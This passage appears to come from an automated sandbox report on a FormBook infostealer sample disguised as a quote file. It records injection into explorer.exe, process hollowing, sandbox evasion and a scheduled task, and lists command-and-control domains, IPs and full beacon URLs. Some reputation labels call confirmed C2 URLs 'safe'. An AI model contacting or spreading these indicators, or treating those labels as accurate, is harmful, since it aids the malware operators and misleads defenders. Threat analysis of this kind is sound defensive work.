          Source: explorer.exe, 00000009.00000000.665522332.0000000000AD8000.00000004.00000020.sdmpBinary or memory string: ProgmanMD6
          Source: explorer.exe, 00000009.00000000.666066464.0000000001080000.00000002.00000001.sdmp, systray.exe, 0000000D.00000002.2094075880.0000000003130000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000009.00000000.678458758.0000000005E50000.00000004.00000001.sdmp, systray.exe, 0000000D.00000002.2094075880.0000000003130000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000009.00000000.666066464.0000000001080000.00000002.00000001.sdmp, systray.exe, 0000000D.00000002.2094075880.0000000003130000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000009.00000000.666066464.0000000001080000.00000002.00000001.sdmp, systray.exe, 0000000D.00000002.2094075880.0000000003130000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000009.00000000.684119760.000000000A716000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd5D
          Source: C:\Users\user\Desktop\quote20210126.exe.exeQueries volume information: C:\Users\user\Desktop\quote20210126.exe.exe VolumeInformation
          Source: C:\Users\user\Desktop\quote20210126.exe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\quote20210126.exe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\quote20210126.exe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\quote20210126.exe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\quote20210126.exe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
          Source: C:\Users\user\Desktop\quote20210126.exe.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000006.00000002.701320257.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.2092044926.0000000000750000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.663461491.0000000003F39000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.702172131.0000000001370000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.663915045.00000000041FE000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.702000441.0000000000F10000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.2093805951.0000000002C00000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.2093723727.00000000029D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 6.2.quote20210126.exe.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.quote20210126.exe.exe.400000.0.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000006.00000002.701320257.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.2092044926.0000000000750000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.663461491.0000000003F39000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.702172131.0000000001370000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.663915045.00000000041FE000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.702000441.0000000000F10000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.2093805951.0000000002C00000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.2093723727.00000000029D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 6.2.quote20210126.exe.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.quote20210126.exe.exe.400000.0.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsScheduled Task/Job1Scheduled Task/Job1Process Injection612Masquerading1OS Credential DumpingSecurity Software Discovery331Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsShared Modules1DLL Side-Loading1Scheduled Task/Job1Virtualization/Sandbox Evasion4LSASS MemoryVirtualization/Sandbox Evasion4Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)DLL Side-Loading1Disable or Modify Tools1Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection612NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol3SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information3LSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonSoftware Packing3Cached Domain CredentialsSystem Information Discovery112VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsDLL Side-Loading1DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 344748 Sample: quote20210126.exe.bin Startdate: 27/01/2021 Architecture: WINDOWS Score: 100 57 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->57 59 Found malware configuration 2->59 61 Malicious sample detected (through community Yara rule) 2->61 63 9 other signatures 2->63 10 quote20210126.exe.exe 7 2->10         started        process3 file4 39 C:\Users\user\AppData\...\nVnzZjnYhVWWZd.exe, PE32 10->39 dropped 41 C:\...\nVnzZjnYhVWWZd.exe:Zone.Identifier, ASCII 10->41 dropped 43 C:\Users\user\AppData\Local\...\tmpC686.tmp, XML 10->43 dropped 45 C:\Users\user\...\quote20210126.exe.exe.log, ASCII 10->45 dropped 67 Tries to detect virtualization through RDTSC time measurements 10->67 69 Injects a PE file into a foreign processes 10->69 14 quote20210126.exe.exe 10->14         started        17 schtasks.exe 1 10->17         started        19 quote20210126.exe.exe 10->19         started        21 2 other processes 10->21 signatures5 process6 signatures7 71 Modifies the context of a thread in another process (thread injection) 14->71 73 Maps a DLL or memory area into another process 14->73 75 Sample uses process hollowing technique 14->75 77 Queues an APC in another process (thread injection) 14->77 23 explorer.exe 14->23 injected 27 conhost.exe 17->27         started        process8 dnsIp9 47 recurrentcornealerosion.com 70.40.220.182, 49764, 49783, 80 UNIFIEDLAYER-AS-1US United States 23->47 49 www.qianglongzhipin.com 192.155.181.96, 80 TELECOM-HKHongKongTelecomGlobalDataCentreHK United States 23->49 51 23 other IPs or domains 23->51 65 System process connects to network (likely due to code injection or exploit) 23->65 29 systray.exe 12 23->29         started        33 autoconv.exe 23->33         started        signatures10 process11 dnsIp12 53 www.xiaoxu.info 29->53 55 www.qianglongzhipin.com 29->55 79 Modifies the context of a thread in another process (thread injection) 29->79 81 Maps a DLL or memory area into another process 29->81 83 Tries to detect virtualization through RDTSC time measurements 29->83 35 cmd.exe 1 29->35         started        signatures13 process14 process15 37 conhost.exe 35->37         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          quote20210126.exe.exe15%ReversingLabsByteCode-MSIL.Trojan.Pwsx
          quote20210126.exe.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Roaming\nVnzZjnYhVWWZd.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Roaming\nVnzZjnYhVWWZd.exe15%ReversingLabsByteCode-MSIL.Trojan.Pwsx

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          6.2.quote20210126.exe.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://tempuri.org/RealProjectDataSet4.xsdUhttp://tempuri.org/RealProjectDataSet5.xsd0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://tempuri.org/RealProjectDataSet6.xsd0%Avira URL Cloudsafe
          http://www.deepimper-325.com/dei5/?TZkpkdJ=aPqrKkv+hSGfZh5BV8qiKF80dMng48q04hmXvL44OtWxx7jRvmKAF8lSdeM/uGAiUXT3&U4kp=NtxLpLUP-vTH68s0%Avira URL Cloudsafe
          http://www.formabench.com/dei5/?TZkpkdJ=KZO0q/dA9tPcHL9GuJx/PgJRYyF7j38H/T1IXfK19NQMGL7UiVuEHiPF3LE2pNg/QeAw&U4kp=NtxLpLUP-vTH68s0%Avira URL Cloudsafe
          http://www.merckcbd.com/dei5/?U4kp=NtxLpLUP-vTH68s&TZkpkdJ=gwg9Jqv6MvMQvSpk15d+b4gnzBpdKN64CFpSPxal95mmJaU4NnZDhIpu8DM9TE7myrtY0%Avira URL Cloudsafe
          http://www.vivabematividadesfisicas.com/dei5/?TZkpkdJ=upQHmHMv4mc+L1U62DbKpSKW5TdFY7AgwVisO4oDb8strNsH+0I7Qox99h9xeSU/sZUm&U4kp=NtxLpLUP-vTH68s0%Avira URL Cloudsafe
          http://tempuri.org/RealProjectDataSet6.xsdUhttp://tempuri.org/RealProjectDataSet7.xsd0%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.0343888.com/dei5/?U4kp=NtxLpLUP-vTH68s&TZkpkdJ=M4RvuutZ2POk+PSHApDAqvJZeP9XKXVIMFKqdR66Gq6TstdOGJ+LE28ruv11hlz0BbZT0%Avira URL Cloudsafe
          http://tempuri.org/RealProjectDataSet4.xsd0%Avira URL Cloudsafe
          http://tempuri.org/RealProjectDataSet7.xsd0%Avira URL Cloudsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.recurrentcornealerosion.com/dei5/?TZkpkdJ=5dK4zS2spH1MRMIlKAKtRXrQS2V8a1emNoyev4a2A9Q6Oz7gRNAUWdiVyhvoRIofoFad&U4kp=NtxLpLUP-vTH68s0%Avira URL Cloudsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.ribbonredwhiteandblue.com/dei5/?TZkpkdJ=g0K5ifwFWV09n7i1NEiFZbu/6tutLBAV6sI0nEyaQ7OZPYqcNrOHgfWcWl8srePs8/mI&U4kp=NtxLpLUP-vTH68s0%Avira URL Cloudsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://tempuri.org/RealProjectDataSet3.xsd0%Avira URL Cloudsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://tempuri.org/RealProjectDataSet.xsd0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.nl22584.com/dei5/?U4kp=NtxLpLUP-vTH68s&TZkpkdJ=0oFOxkVJsX06l7Ol9X6AmLZqAaNZWQ2XjAttG/9CS/jIsyrA37kUn+ErxcpPHIAnpq8x0%Avira URL Cloudsafe
          http://www.vasquez.photos/dei5/?TZkpkdJ=cnY7xDevrfqWnvOquF7kiqklKJL/wdDM1MHBb5XJK+cnY7Wyj/zDn1i5dZ9sTrZ3na4b&U4kp=NtxLpLUP-vTH68s0%Avira URL Cloudsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://tempuri.org/RealProjectDataSet2.xsd0%Avira URL Cloudsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://tempuri.org/RealProjectDataSet5.xsd0%Avira URL Cloudsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://tempuri.org/RealProjectDataSet1.xsd0%Avira URL Cloudsafe
          http://tempuri.org/RealProjectDataSet1.xsdUhttp://tempuri.org/RealProjectDataSet2.xsd0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          deepimper-325.com
          150.95.52.72
          truetrue
            unknown
            prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com
            3.140.151.209
            truefalse
              high
              recurrentcornealerosion.com
              70.40.220.182
              truetrue
                unknown
                vivabematividadesfisicas.com
                107.180.2.197
                truetrue
                  unknown
                  www.xiaoxu.info
                  42.194.179.169
                  truetrue
                    unknown
                    nl22584.com
                    23.253.11.194
                    truetrue
                      unknown
                      www.qianglongzhipin.com
                      192.155.181.96
                      truetrue
                        unknown
                        parkingpage.namecheap.com
                        198.54.117.215
                        truefalse
                          high
                          3002vip.mayifanghucdn1.com
                          143.92.60.97
                          truetrue
                            unknown
                            ext-sq.squarespace.com
                            198.49.23.144
                            truefalse
                              high
                              ribbonredwhiteandblue.com
                              34.102.136.180
                              truetrue
                                unknown
                                www.studioeduardobeninca.com
                                unknown
                                unknowntrue
                                  unknown
                                  www.appliedrate.com
                                  unknown
                                  unknowntrue
                                    unknown
                                    www.formabench.com
                                    unknown
                                    unknowntrue
                                      unknown
                                      www.vasquez.photos
                                      unknown
                                      unknowntrue
                                        unknown
                                        www.followmargpolo.com
                                        unknown
                                        unknowntrue
                                          unknown
                                          www.ribbonredwhiteandblue.com
                                          unknown
                                          unknowntrue
                                            unknown
                                            www.deepimper-325.com
                                            unknown
                                            unknowntrue
                                              unknown
                                              www.recurrentcornealerosion.com
                                              unknown
                                              unknowntrue
                                                unknown
                                                www.sorryididnthearthat.com
                                                unknown
                                                unknowntrue
                                                  unknown
                                                  www.vivabematividadesfisicas.com
                                                  unknown
                                                  unknowntrue
                                                    unknown
                                                    www.0343888.com
                                                    unknown
                                                    unknowntrue
                                                      unknown
                                                      www.merckcbd.com
                                                      unknown
                                                      unknowntrue
                                                        unknown
                                                        www.nl22584.com
                                                        unknown
                                                        unknowntrue
                                                          unknown

                                                          Contacted URLs

                                                          NameMaliciousAntivirus DetectionReputation
                                                          http://www.deepimper-325.com/dei5/?TZkpkdJ=aPqrKkv+hSGfZh5BV8qiKF80dMng48q04hmXvL44OtWxx7jRvmKAF8lSdeM/uGAiUXT3&U4kp=NtxLpLUP-vTH68strue
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.formabench.com/dei5/?TZkpkdJ=KZO0q/dA9tPcHL9GuJx/PgJRYyF7j38H/T1IXfK19NQMGL7UiVuEHiPF3LE2pNg/QeAw&U4kp=NtxLpLUP-vTH68strue
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.merckcbd.com/dei5/?U4kp=NtxLpLUP-vTH68s&TZkpkdJ=gwg9Jqv6MvMQvSpk15d+b4gnzBpdKN64CFpSPxal95mmJaU4NnZDhIpu8DM9TE7myrtYtrue
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.vivabematividadesfisicas.com/dei5/?TZkpkdJ=upQHmHMv4mc+L1U62DbKpSKW5TdFY7AgwVisO4oDb8strNsH+0I7Qox99h9xeSU/sZUm&U4kp=NtxLpLUP-vTH68strue
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.0343888.com/dei5/?U4kp=NtxLpLUP-vTH68s&TZkpkdJ=M4RvuutZ2POk+PSHApDAqvJZeP9XKXVIMFKqdR66Gq6TstdOGJ+LE28ruv11hlz0BbZTtrue
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.recurrentcornealerosion.com/dei5/?TZkpkdJ=5dK4zS2spH1MRMIlKAKtRXrQS2V8a1emNoyev4a2A9Q6Oz7gRNAUWdiVyhvoRIofoFad&U4kp=NtxLpLUP-vTH68strue
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.ribbonredwhiteandblue.com/dei5/?TZkpkdJ=g0K5ifwFWV09n7i1NEiFZbu/6tutLBAV6sI0nEyaQ7OZPYqcNrOHgfWcWl8srePs8/mI&U4kp=NtxLpLUP-vTH68strue
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.nl22584.com/dei5/?U4kp=NtxLpLUP-vTH68s&TZkpkdJ=0oFOxkVJsX06l7Ol9X6AmLZqAaNZWQ2XjAttG/9CS/jIsyrA37kUn+ErxcpPHIAnpq8xtrue
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.vasquez.photos/dei5/?TZkpkdJ=cnY7xDevrfqWnvOquF7kiqklKJL/wdDM1MHBb5XJK+cnY7Wyj/zDn1i5dZ9sTrZ3na4b&U4kp=NtxLpLUP-vTH68strue
                                                          • Avira URL Cloud: safe
                                                          unknown

                                                          URLs from Memory and Binaries

                                                          NameSourceMaliciousAntivirus DetectionReputation
                                                          http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000009.00000000.688104413.000000000B976000.00000002.00000001.sdmpfalse
                                                            high
                                                            http://www.fontbureau.comexplorer.exe, 00000009.00000000.688104413.000000000B976000.00000002.00000001.sdmpfalse
                                                              high
                                                              http://www.fontbureau.com/designersGexplorer.exe, 00000009.00000000.688104413.000000000B976000.00000002.00000001.sdmpfalse
                                                                high
                                                                http://tempuri.org/RealProjectDataSet4.xsdUhttp://tempuri.org/RealProjectDataSet5.xsdquote20210126.exe.exefalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.fontbureau.com/designers/?explorer.exe, 00000009.00000000.688104413.000000000B976000.00000002.00000001.sdmpfalse
                                                                  high
                                                                  http://www.founder.com.cn/cn/bTheexplorer.exe, 00000009.00000000.688104413.000000000B976000.00000002.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  http://tempuri.org/RealProjectDataSet6.xsdquote20210126.exe.exefalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  http://www.fontbureau.com/designers?explorer.exe, 00000009.00000000.688104413.000000000B976000.00000002.00000001.sdmpfalse
                                                                    high
                                                                    http://tempuri.org/RealProjectDataSet6.xsdUhttp://tempuri.org/RealProjectDataSet7.xsdquote20210126.exe.exefalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://www.tiro.comexplorer.exe, 00000009.00000000.688104413.000000000B976000.00000002.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    http://tempuri.org/RealProjectDataSet4.xsdquote20210126.exe.exefalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://www.fontbureau.com/designersexplorer.exe, 00000009.00000000.688104413.000000000B976000.00000002.00000001.sdmpfalse
                                                                      high
                                                                      http://tempuri.org/RealProjectDataSet7.xsdquote20210126.exe.exefalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://www.goodfont.co.krexplorer.exe, 00000009.00000000.688104413.000000000B976000.00000002.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      http://www.carterandcone.comlexplorer.exe, 00000009.00000000.688104413.000000000B976000.00000002.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      http://www.sajatypeworks.comexplorer.exe, 00000009.00000000.688104413.000000000B976000.00000002.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      http://www.typography.netDexplorer.exe, 00000009.00000000.688104413.000000000B976000.00000002.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 00000009.00000000.688104413.000000000B976000.00000002.00000001.sdmpfalse
                                                                        high
                                                                        http://www.founder.com.cn/cn/cTheexplorer.exe, 00000009.00000000.688104413.000000000B976000.00000002.00000001.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        http://tempuri.org/RealProjectDataSet3.xsdquote20210126.exe.exefalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 00000009.00000000.688104413.000000000B976000.00000002.00000001.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        http://fontfabrik.comexplorer.exe, 00000009.00000000.688104413.000000000B976000.00000002.00000001.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        http://www.founder.com.cn/cnexplorer.exe, 00000009.00000000.688104413.000000000B976000.00000002.00000001.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        http://www.fontbureau.com/designers/frere-user.htmlexplorer.exe, 00000009.00000000.688104413.000000000B976000.00000002.00000001.sdmpfalse
                                                                          high
                                                                          http://tempuri.org/RealProjectDataSet.xsdquote20210126.exe.exefalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          http://www.jiyu-kobo.co.jp/explorer.exe, 00000009.00000000.688104413.000000000B976000.00000002.00000001.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000009.00000000.688104413.000000000B976000.00000002.00000001.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          http://www.fontbureau.com/designers8explorer.exe, 00000009.00000000.688104413.000000000B976000.00000002.00000001.sdmpfalse
                                                                            high
                                                                            http://tempuri.org/RealProjectDataSet2.xsdquote20210126.exe.exefalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            http://www.%s.comPAexplorer.exe, 00000009.00000002.2095501897.0000000002B50000.00000002.00000001.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            low
                                                                            http://www.fonts.comexplorer.exe, 00000009.00000000.688104413.000000000B976000.00000002.00000001.sdmpfalse
                                                                              high
                                                                              http://www.sandoll.co.krexplorer.exe, 00000009.00000000.688104413.000000000B976000.00000002.00000001.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              http://www.urwpp.deDPleaseexplorer.exe, 00000009.00000000.688104413.000000000B976000.00000002.00000001.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              http://www.zhongyicts.com.cnexplorer.exe, 00000009.00000000.688104413.000000000B976000.00000002.00000001.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              http://tempuri.org/RealProjectDataSet5.xsdquote20210126.exe.exefalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namequote20210126.exe.exe, 00000000.00000002.662953284.0000000002F31000.00000004.00000001.sdmpfalse
                                                                                high
                                                                                http://www.sakkal.comexplorer.exe, 00000009.00000000.688104413.000000000B976000.00000002.00000001.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                http://tempuri.org/RealProjectDataSet1.xsdquote20210126.exe.exefalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                http://tempuri.org/RealProjectDataSet1.xsdUhttp://tempuri.org/RealProjectDataSet2.xsdquote20210126.exe.exefalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown

                                                                                Contacted IPs

                                                                                • No. of IPs < 25%
                                                                                • 25% < No. of IPs < 50%
                                                                                • 50% < No. of IPs < 75%
                                                                                • 75% < No. of IPs

                                                                                Public

                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                150.95.52.72
                                                                                unknownJapan7506INTERQGMOInternetIncJPtrue
                                                                                192.155.181.96
                                                                                unknownUnited States
                                                                                132422TELECOM-HKHongKongTelecomGlobalDataCentreHKtrue
                                                                                107.180.2.197
                                                                                unknownUnited States
                                                                                26496AS-26496-GO-DADDY-COM-LLCUStrue
                                                                                143.92.60.97
                                                                                unknownSingapore
                                                                                64050BCPL-SGBGPNETGlobalASNSGtrue
                                                                                3.140.151.209
                                                                                unknownUnited States
                                                                                16509AMAZON-02USfalse
                                                                                198.49.23.144
                                                                                unknownUnited States
                                                                                53831SQUARESPACEUSfalse
                                                                                42.194.179.169
                                                                                unknownChina
                                                                                45090CNNIC-TENCENT-NET-APShenzhenTencentComputerSystemsCompatrue
                                                                                70.40.220.182
                                                                                unknownUnited States
                                                                                46606UNIFIEDLAYER-AS-1UStrue
                                                                                34.102.136.180
                                                                                unknownUnited States
                                                                                15169GOOGLEUStrue
                                                                                198.54.117.215
                                                                                unknownUnited States
                                                                                22612NAMECHEAP-NETUSfalse
                                                                                23.253.11.194
                                                                                unknownUnited States
                                                                                19994RACKSPACEUStrue

                                                                                Private

                                                                                IP
                                                                                192.168.2.1

                                                                                General Information

                                                                                Joe Sandbox Version:31.0.0 Emerald
                                                                                Analysis ID:344748
                                                                                Start date:27.01.2021
                                                                                Start time:03:15:34
                                                                                Joe Sandbox Product:CloudBasic
                                                                                Overall analysis duration:0h 21m 23s
                                                                                Hypervisor based Inspection enabled:false
                                                                                Report type:light
